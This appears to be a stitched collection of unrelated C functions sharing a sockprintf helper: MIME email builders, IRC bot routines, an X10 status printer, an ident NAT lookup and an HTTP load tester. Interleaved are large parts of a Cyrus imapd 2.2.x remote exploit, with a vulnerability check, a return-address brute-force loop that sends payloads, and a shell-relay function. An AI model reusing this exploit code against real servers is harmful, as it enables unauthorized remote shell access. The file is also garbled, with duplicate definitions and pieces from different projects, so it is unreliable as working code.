void mimetextpartheader(SOCKET socket, char* boundary)
{
sockprintf(socket,"--%s",boundary);
sockprintf(socket,"Content-Type: text/plain;");
sockprintf(socket," charset=\"iso-8859-1\"");
sockprintf(socket,"Content-Transfer-Encoding: 7bit");
}
void vsend_cmd(const char *source, const char *fmt, va_list args)
{
char buf[BUFSIZE];
vsnprintf(buf, sizeof(buf), fmt, args);
if (source) {
sockprintf(servsock, ":%s %s\r\n", source, buf);
if (debug)
log("debug: Sent: :%s %s", source, buf);
} else {
sockprintf(servsock, "%s\r\n", buf);
if (debug)
log("debug: Sent: %s", buf);
}
}
void proto_connect() {
{
struct addrinfo *info = get_addr_info(bot->host, bot->port);
bot->socket = getsock(info);
fcntl(bot->socket, F_SETFL, O_NONBLOCK);
bot->running = 1;
// we won't need this anymore.
freeaddrinfo(info);
}
printf("[irc\tinfo] registering with the server.\n");
sockprintf(bot->socket, "NICK %s", bot->nick);
sockprintf(bot->socket, "USER apollo * * :hi i'm apollo");
}
void vulnchck(struct sockaddr_in addr, int port){
char payload[1024];
int sock;
struct timeval timeout;
fd_set fds;
timeout.tv_sec = 3;
timeout.tv_usec = 0;
printf("[!] Checking if the server is vuln!\n");
if((sock = conn(addr, port)) == -1){
printf("[-] Connecting failed!\n");
exit(1);
}
gen_payload(payload, sizeof(payload), 0x00, 0);
sockprintf(sock, "%s\r\n", payload);
if(recv(sock, payload, sizeof(payload), 0) < 1){
printf("[+] Yeaahaa server is vuln, lets f**k that bitch!\n");
close(sock);
return;
}
printf("[-] Server not vuln!\n");
close(sock);
exit(1);
}
void irc_invite(struct bot *bot, struct message *msg) {
char *args = strdup(msg->arg);
char *chan = last(args);
sockprintf(bot->socket, "JOIN :%s", chan+1);
free(args);
free(chan);
}
/**
* actually Send a command to the server.
* @param source Orgin of the Message (some times NULL)
* @param fmt Format of the Message
* @param args List of the arguments
* @return void
*/
void vsend_cmd(const char *source, const char *fmt, va_list args)
{
char buf[BUFSIZE];
*buf = '\0';
if (fmt) {
vsnprintf(buf, BUFSIZE - 1, fmt, args);
if (source) {
sockprintf(servsock, ":%s %s\r\n", source, buf);
eventprintf(":%s %s", source, buf);
if (debug) {
alog("debug: Sent: :%s %s", source, buf);
}
} else {
sockprintf(servsock, "%s\r\n", buf);
eventprintf("%s", buf);
if (debug) {
alog("debug: Sent: %s", buf);
}
}
}
}
BOOL mimeattach(SOCKET socket, char* boundary, char* pathfile)
{
char* fname = getfname(pathfile);
sockprintf(socket,"--%s",boundary);
sockprintf(socket,"Content-Type: application/octet-stream;");
sockprintf(socket," name=\"%s\"",fname);
sockprintf(socket,"Content-Transfer-Encoding: base64");
sockprintf(socket,"Content-Disposition: attachment;");
sockprintf(socket," filename=\"%s\"",fname);
sockprintf(socket,"");
if(!base64out(socket,pathfile))
return(FALSE);
sockprintf(socket,"");
return(TRUE);
}
BOOL base64out(SOCKET socket, char* pathfile)
{
FILE * fp;
char in[57];
char out[77];
int bytesread;
if((fp=fopen(pathfile,"rb"))==NULL)
return(FALSE);
while(1) {
bytesread=fread(in,1,sizeof(in),fp);
if((b64_encode(out,sizeof(out),in,bytesread)==-1)
|| !sockprintf(socket,out)) {
fclose(fp);
return(FALSE);
}
if(bytesread!=sizeof(in) || feof(fp))
break;
}
fclose(fp);
sockprintf(socket,"");
return(TRUE);
}
int get_shell(struct sockaddr_in addr, int port, int sleeps){
int sock;
char buffer[1024];
fd_set fds;
sleep(sleeps);
if((sock = conn(addr, port)) == -1)
return (-1);
printf("[+]\n[+] Wooohooo we got a shell!\n");
sockprintf(sock, SHELL_COMMAND"\r\n");
while(1){
FD_ZERO(&fds);
FD_SET(0, &fds);
FD_SET(sock, &fds);
if (select(255, &fds, NULL, NULL, NULL) == -1){
fprintf(stderr,"[-] sending failed\n");
close(sock);
exit(1);
}
memset(buffer, 0x0, sizeof(buffer));
if (FD_ISSET(sock, &fds)){
if (recv(sock, buffer, sizeof(buffer), 0) == -1){
fprintf(stderr, "[-] Connection closed by remote host!\n");
close(sock);
exit(1);
}
fprintf(stderr, "%s", buffer);
}
if (FD_ISSET(0, &fds)){
read(0, buffer, sizeof(buffer));
write(sock, buffer, strlen(buffer));
}
}
return 0;
}
void hua_show(int fd)
{
int h, u;
char buf[2048];
int labeldone;
int sensor;
x10secsensor_t *sen;
sockprintf(fd, "Device selected\n");
for (h = 0; h < 16; h++) {
labeldone = 0;
buf[0] = '\0';
for (u = 0; u < 16; u++) {
if (HouseUnitSelected[h][u]) {
if (!labeldone) {
labeldone = 1;
snprintf(buf+strlen(buf), sizeof(buf)-strlen(buf),
"House %c: %d", h+'A', u+1);
}
else
snprintf(buf+strlen(buf), sizeof(buf)-strlen(buf),
",%d", u+1);
}
}
if (labeldone) {
strcat(buf, "\n");
sockprintf(fd, buf, strlen(buf));
}
}
sockprintf(fd, "Device status\n");
for (h = 0; h < 16; h++) {
labeldone = 0;
buf[0] = '\0';
for (u = 0; u < 16; u++) {
if (HouseUnitState[h][u]) {
if (!labeldone) {
labeldone = 1;
snprintf(buf+strlen(buf), sizeof(buf)-strlen(buf),
"House %c: %d=%c", h+'A', u+1, HouseUnitState[h][u]);
}
else
snprintf(buf+strlen(buf), sizeof(buf)-strlen(buf),
",%d=%c", u+1, HouseUnitState[h][u]);
}
}
if (labeldone) {
strcat(buf, "\n");
sockprintf(fd, buf, strlen(buf));
}
}
sockprintf(fd, "Security sensor status\n");
qsort(X10sensors, X10sensorcount, sizeof(X10sensors[0]), cmpX10sensor);
for (sensor = 0; sensor < X10sensorcount; sensor++) {
time_t deltat, mins;
const char *message;
sen = &X10sensors[sensor];
deltat = time(NULL) - sen->lastupdate;
mins = deltat / 60;
deltat = deltat - (mins * 60);
if (sen->secaddr8)
message = findSecRemoteKeyName(sen->sensorstatus);
else
message = findSecEventName(sen->sensorstatus);
sockprintf(fd, "Sensor addr: %06X Last: %02d:%02d %s \n", sen->secaddr,
mins, deltat, message);
}
sockprintf(fd, "End status\n");
}
void proto_tick() {
int nbytes;
char data[BUFSIZE/2];
while (bot->running) {
memset(&data, 0, BUFSIZE/2);
tick:
tick_functions();
recv:
if ((nbytes = recv(bot->socket, data, (BUFSIZE/2)-1, 0)) == -1) {
if (errno == EINTR) {
// what a pain in the ass,
// we got interrupted >.>
goto recv;
}
if (errno == EAGAIN) {
usleep(16666);
goto tick;
}
perror("recv failed");
exit(4);
}
strcat(bot->buffer, data);
if (nbytes == 0) {
bot->running = 0;
}
char *i = irc_getline(bot);
if (i == NULL) {
return;
}
for (; i != NULL; i = irc_nextline(bot)) {
printf("%s\n", i);
if (startswith(i, "PING")) {
char *t = last(i);
sockprintf(bot->socket, "PONG %s", t);
free(t);
free(i);
continue;
}
struct message *msg = parse(i);
if (EQ(msg->meth, "422") || EQ(msg->meth, "376")) {
sockprintf(bot->socket, "JOIN #bots");
}
Link *handlers = hashmap_get(msg->meth, bot->handlers);
for (Link *i = handlers; i != NULL; i = i->next) {
((handler_t)i->ptr)(bot, msg);
}
freemsg(msg);
free(i);
}
}
}
int main(int argc, char **argv){
char *payload = NULL, *hostn = NULL, buffer[1024], *ptr;
int i, first, sock, opt, target = 0, port = 143,
shell_port = atoi(SHELL_PORT), sleeps = 1,
p_size=10000, ret_bf_start = RET_BF_START,
ret_bf_end = RET_BF_END, vulncheck = 1;
fd_set fds;
struct sockaddr_in addr;
printf("[!] Cyrus imapd 2.2.4 - 2.2.8 remote exploit by crash-x / unl0ck\n");
if (argc < 2)
usage(argv[0]);
while ((opt = getopt (argc, argv, "h:p:t:s:P:S:E:vV")) != -1){
switch (opt){
case 'h':
hostn = optarg;
break;
case 'p':
port = atoi(optarg);
if(port > 65535 || port < 1){
printf("[-] Port %d is invalid\n",port);
return 1;
}
break;
case 't':
target = atoi(optarg);
for(i = 0; targets[i].platform; i++);
if(target >= i && target != 1337){
printf("[-] Wtf are you trying to target?\n");
usage(argv[0]);
}
break;
case 'S':
ret_bf_start = strtoul(optarg,NULL,0);
if(!ret_bf_start){
printf("[-] Wtf thats not a valid bruteforce start address!\n");
usage(argv[0]);
}
break;
case 'E':
ret_bf_end = strtoul(optarg,NULL,0);
if(!ret_bf_end){
printf("[-] Wtf thats not a valid bruteforce end address!\n");
usage(argv[0]);
}
break;
case 's':
sleeps = atoi(optarg);
break;
case 'P':
p_size = atoi(optarg);
if(p_size < 1000){
printf("[-] Its a bad idea to have a payload with less than 1000 bytes :)\n");
return 1;
}
break;
case 'v':
vulncheck = 2;
break;
case 'V':
vulncheck = 0;
break;
default:
usage(argv[0]);
}
}
if(hostn == NULL)
usage(argv[0]);
if(payload == NULL){
if(!(payload = malloc(p_size))){
printf("[-] Wasnt able to allocate space for the payload!\n");
return 1;
}
}
resolv(&addr, hostn);
if(vulncheck == 2){
vulnchck(addr, port);
return 1;
}
else if(vulncheck == 1)
vulnchck(addr, port);
if(target != 1337){
ret_bf_start = targets[target].retloc;
ret_bf_end = targets[target].retloc+5;
printf ("[!] Targeting %s\n", targets[target].platform);
} else
printf("[!] Starting bruteforce attack!\n");
for(i = 0, first = 1; ret_bf_start < ret_bf_end; i++, first++){
if((sock = conn(addr, port)) == -1){
if(first != 1)
printf("\n");
printf("[-] Connecting failed!\n");
break;
}
if(i == 4)
ret_bf_start += (p_size - (p_size/10));
else
ret_bf_start++;
gen_payload(payload, p_size, ret_bf_start, 1);
status(ret_bf_start, ret_bf_start + (p_size - (p_size/10)),
ret_bf_start + (p_size - (p_size/10/2)));
sockprintf(sock, "%s\r\n", payload);
if(i == 4){
get_shell(addr, shell_port, sleeps);
i = 0;
}
if(ret_bf_start >= ret_bf_end)
printf("[-]\n");
close(sock);
}
printf("[-] Exploit failed!\n");
return 1;
}
int masq( int sock,
in_port_t lport,
in_port_t fport,
struct sockaddr_storage *laddr,
struct sockaddr_storage *faddr)
{
nat_t *np;
nat_t nat;
char os[24];
char user[MAX_ULEN];
struct sockaddr_storage ss;
/*
** Only IPv4 is supported right now..
*/
if (faddr->ss_family != AF_INET || laddr->ss_family != AF_INET)
return (-1);
if (getbuf(kinfo->nl[N_NATLIST].n_value, &np, sizeof(np)) == -1)
return (-1);
for (; np != NULL ; np = nat.nat_next) {
int ret;
in_port_t masq_lport;
if (getbuf((u_long) np, &nat, sizeof(nat)) == -1) {
debug("getbuf: %s", strerror(errno));
break;
}
if (nat.nat_p != IPPROTO_TCP)
continue;
if (lport != nat.nat_outport)
continue;
if (fport != nat.nat_oport)
continue;
if (SIN4(laddr)->sin_addr.s_addr != nat.nat_outip.s_addr)
continue;
if (SIN4(faddr)->sin_addr.s_addr != nat.nat_oip.s_addr) {
if (!opt_enabled(PROXY))
continue;
if (SIN4(faddr)->sin_addr.s_addr != SIN4(&proxy)->sin_addr.s_addr)
continue;
if (SIN4(laddr)->sin_addr.s_addr == SIN4(&proxy)->sin_addr.s_addr)
continue;
}
lport = ntohs(lport);
fport = ntohs(fport);
masq_lport = ntohs(nat.nat_inport);
sin_setv4(nat.nat_inip.s_addr, &ss);
if (opt_enabled(FORWARD)) {
ret = fwd_request(sock, lport, masq_lport, fport, &ss);
if (ret == 0)
return (0);
else {
char ipbuf[MAX_IPLEN];
get_ip(&ss, ipbuf, sizeof(ipbuf));
debug("Forward to %s (%d %d | %d %d) failed",
ipbuf, lport, fport, nat.nat_inport, nat.nat_outport);
}
}
ret = find_masq_entry(&ss, user, sizeof(user), os, sizeof(os));
if (ret == 0) {
char ipbuf[MAX_IPLEN];
sockprintf(sock, "%d , %d : USERID : %s : %s\r\n",
lport, fport, os, user);
get_ip(faddr, ipbuf, sizeof(ipbuf));
o_log(NORMAL,
"[%s] (NAT) Successful lookup: %d , %d : %s",
ipbuf, lport, fport, user);
return (0);
}
}
return (-1);
}
int WINAPI ClientMain(void * clientNo) {
SOCKET soc;
time_t lastData;
size_t totalData = 0;
size_t bodyData = 0;
int isBody = 0;
int isTest = (clientNo == 0);
int cpu = ((int)clientNo) % 100;
int timeOut = 10;
const char * resource = 0;
const char * method = 0;
unsigned long i, j;
// Method: PUT or GET
if (METHODINDEX < sizeof(METHODLIST)/sizeof(METHODLIST[0])) {
method = METHODLIST[METHODINDEX];
}
if (method == 0) {
EnterCriticalSection(&cs);
printf("\r\nClient %u: bad method\a\r\n", (int)clientNo);
LeaveCriticalSection(&cs);
return 1;
}
// Resource
if (RESOURCEINDEX < sizeof(RESOURCELIST)/sizeof(RESOURCELIST[0])) {
resource = RESOURCELIST[RESOURCEINDEX];
}
if (resource == 0) {
EnterCriticalSection(&cs);
printf("\r\nClient %u: bad resource\a\r\n", (int)clientNo);
LeaveCriticalSection(&cs);
return 2;
}
// CPU
if ((!isTest) && (((1ULL<<cpu) & availableCPUs)!=0)) {
SetThreadAffinityMask(GetCurrentThread(), 1ULL<<cpu);
}
// TCP
soc = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
if (soc==INVALID_SOCKET) {
EnterCriticalSection(&cs);
printf("\r\nClient %u: cannot create socket\a\r\n", (int)clientNo);
LeaveCriticalSection(&cs);
return 3;
}
// comment in to disable Nagle:
{int disable_Nagle = 1; setsockopt(soc, IPPROTO_TCP, TCP_NODELAY, (char *) &disable_Nagle, sizeof(disable_Nagle));}
if (connect(soc, (SOCKADDR*)&target, sizeof(target))) {
EnterCriticalSection(&cs);
printf("\r\nClient %u: cannot connect to server %s:%u\a\r\n", (int)clientNo, HOST, PORT);
LeaveCriticalSection(&cs);
return 4;
}
for (j=0; j<((keep_alive>0)?keep_alive:1); j++) {
// HTTP request
if (queryStringSize>0) {
sockprintf(soc, "%s %s?", method, resource);
for (i=0;i<(queryStringSize/10);i++) {sockprintf(soc, "1234567890");}
for (i=0;i<(queryStringSize%10);i++) {sockprintf(soc, "_");}
sockprintf(soc, " HTTP/1.1\r\nHost: %s\r\n", HOST);
} else {
sockprintf(soc, "%s %s HTTP/1.1\r\nHost: %s\r\n", method, resource, HOST);
}
if (keep_alive) {
sockprintf(soc, "Connection: Keep-Alive\r\n");
} else {
sockprintf(soc, "Connection: Close\r\n");
}
for (i=0;i<(extraHeadSize/25);i++) {sockprintf(soc, "Comment%04u: 1234567890\r\n", i % 10000);} /* omit (extraHeadSize%25) */
if (!strcmp(method,"GET")) {
sockprintf(soc, "\r\n");
} else if (chunked) {
sockprintf(soc, "Transfer-Encoding: chunked\r\n\r\n", postSize);
for (i=0;i<(postSize/10);i++) {sockprintf(soc, "A\r\n1234567890\r\n");}
if ((postSize%10)>0) {
sockprintf(soc, "%x\r\n", postSize%10);
for (i=0;i<(postSize%10);i++) {sockprintf(soc, "_");}
sockprintf(soc, "\r\n");
}
} else {
// not GET
sockprintf(soc, "Content-Length: %u\r\n\r\n", postSize);
for (i=0;i<postSize/10;i++) {sockprintf(soc, "1234567890");}
for (i=0;i<postSize%10;i++) {sockprintf(soc, ".");}
timeOut += postSize/10000;
}
if (!keep_alive) {
shutdown(soc, SD_SEND);
} else {
timeOut = 2;
}
// wait for response from the server
bodyData = totalData = 0;
isBody = 0;
lastData = time(0);
for (;;) {
char buf[20480];
int chunkSize = 0;
unsigned long dataReady = 0;
Sleep(1);
if (ioctlsocket(soc, FIONREAD, &dataReady) < 0) break;
if (dataReady) {
chunkSize = recv(soc, buf+totalData, sizeof(buf)-totalData, 0);
if (chunkSize<0) {
printf("Error: recv failed for client %i\r\n", (int)clientNo);
break;
} else if (!isBody) {
char * headEnd = strstr(buf,"\xD\xA\xD\xA");
if (headEnd) {
headEnd+=4;
chunkSize -= ((int)headEnd - (int)buf);
if (chunkSize>0) {
//fwrite(headEnd,1,got,STORE);
bodyData += chunkSize;
}
isBody=1;
}
} else {
//fwrite(buf,1,got,STORE);
bodyData += chunkSize;
}
lastData = time(0);
totalData += chunkSize;
} else {
time_t current = time(0);
if (difftime(current, lastData) > timeOut) {
break;
}
Sleep(10);
}
}
EnterCriticalSection(&cs);
if (isTest) {
expectedData = totalData;
} else if (totalData != expectedData) {
printf("Error: Client %u got %u bytes instead of %u\r\n", (int)clientNo, totalData, expectedData);
bad++;
} else {
good++;
}
LeaveCriticalSection(&cs);
if (keep_alive) {
Sleep(10);
}
}
shutdown(soc, SD_BOTH);
closesocket(soc);
return 0;
}
void mimeblurb(SOCKET socket, char* boundary)
{
sockprintf(socket,"This is a multi-part message in MIME format.");
sockprintf(socket,"");
}
void mimeheaders(SOCKET socket, char* boundary)
{
sockprintf(socket,"MIME-Version: 1.0");
sockprintf(socket,"Content-Type: multipart/mixed;");
sockprintf(socket," boundary=\"%s\"",boundary);
}
void endmime(SOCKET socket, char* boundary)
{
/* last boundary */
sockprintf(socket,"--%s--",boundary);
sockprintf(socket,"");
}
